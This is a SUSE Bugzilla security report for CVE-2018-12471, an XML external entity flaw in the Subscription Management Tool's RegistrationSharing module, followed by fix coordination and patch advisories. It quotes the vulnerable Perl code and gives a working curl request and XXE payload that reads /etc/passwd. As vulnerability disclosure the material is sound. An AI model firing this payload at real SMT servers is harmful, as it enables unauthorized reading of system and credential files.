Bugzilla – Bug 1103809
VUL-0: CVE-2018-12471: smt: Xml External Entity processing in the RegistrationSharing modules allows arbitrary file read
Last modified: 2020-09-18 12:37:40 UTC
EMBARGOED reported by ebx@riseup.net via mail to security@suse.de [...] current release (v3.0.32) of the Subscription Management Tool (https://github.com/SUSE/smt) [...] in the RegistrationSharing module The first vulnerability is an XXE that can be exploited during both the `deleteSharedRegistration` and `addSharedRegistration` subroutines. In RegistrationSharing.pm, the `_getXMLFromPostData` subroutine (https://github.com/SUSE/smt/blob/SMT12/www/perl-lib/SMT/RegistrationSharing.pm#L342) contains code to parse XML data from POST requests (utilized in the aforementioned routines): ... my $postData = shift; my $xml; my $parser = XML::LibXML->new(); eval { # load_xml not available on SLES 11 SP3 due to version of # LibXML and underlying libxml2 #$xm = XML::LibXML->load_xml(string => $postData); my $POSTDATAFL = File::Temp->new(SUFFIX=>'.txt'); $POSTDATAFL->write($postData); $POSTDATAFL->flush(); seek $POSTDATAFL, 0,0; $xml = $parser->parse_fh($POSTDATAFL); }; .... The code creates a new XML parser, dumps the POST data to a new temporary file and then uses the previously created parser to parse the XML from the temporary file. The problem here is that Perls LibXML library by default allows external entities to be loaded. By sending a specially crafted XML payload it is possible to achieve DOS and SSRF. Additionally, due to a reflection point in code that echos back the entire XML document when no table name is specified (https://github.com/SUSE/smt/blob/SMT12/www/perl-lib/SMT/RegistrationSharing.pm#L293) it is possible to read arbitrary files from the machine. Here is an example payload that will read /etc/passwd: curl -X POST -d @readfile.xml "http://<smt_url>/center/regsvc?command=shareregistration&lang=en-US&version=1.0" readfile.xml: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <registrationData> <tableData> <entry columnName="NAMESPACE" value="">&xxe;</entry> <entry columnName="HOSTNAME" value="smt-client"/> </tableData> </registrationData>
We created a private repo to work on a fix for this issue: https://github.com/SUSE/smt-security-update Could you open a pull request for that one?
I have assigned CVE-2018-12471.
SUSE would like to thank Jake Miller for reporting these issues to us.
updates released
SUSE-SU-2018:2898-1: An update that solves three vulnerabilities and has 6 fixes is now available. Category: security (important) Bug References: 1006984,1006989,1037811,1097560,1097824,1103809,1103810,1104076,977043 CVE References: CVE-2018-12470,CVE-2018-12471,CVE-2018-12472 Sources used: SUSE OpenStack Cloud 7 (src): smt-3.0.37-52.23.6 SUSE Linux Enterprise Server for SAP 12-SP2 (src): smt-3.0.37-52.23.6 SUSE Linux Enterprise Server for SAP 12-SP1 (src): smt-3.0.37-52.23.6, yast2-smt-3.0.14-10.6.2 SUSE Linux Enterprise Server 12-SP3 (src): smt-3.0.37-52.23.6 SUSE Linux Enterprise Server 12-SP2-LTSS (src): smt-3.0.37-52.23.6 SUSE Linux Enterprise Server 12-SP1-LTSS (src): smt-3.0.37-52.23.6, yast2-smt-3.0.14-10.6.2 SUSE Linux Enterprise Module for Public Cloud 12 (src): perl-File-Touch-0.11-3.2.2, smt-3.0.37-52.23.6 SUSE Enterprise Storage 4 (src): smt-3.0.37-52.23.6
SUSE-SU-2018:2899-1: An update that solves three vulnerabilities and has two fixes is now available. Category: security (important) Bug References: 1072921,1074608,1103809,1103810,1104076 CVE References: CVE-2018-12470,CVE-2018-12471,CVE-2018-12472 Sources used: Subscription Management Tool for SUSE Linux Enterprise 11-SP3 (src): smt-2.0.34-50.8.1
fixed
SUSE-SU-2018:2898-2: An update that solves three vulnerabilities and has 6 fixes is now available. Category: security (important) Bug References: 1006984,1006989,1037811,1097560,1097824,1103809,1103810,1104076,977043 CVE References: CVE-2018-12470,CVE-2018-12471,CVE-2018-12472 Sources used: SUSE Linux Enterprise Server 12-SP2-BCL (src): smt-3.0.37-52.23.6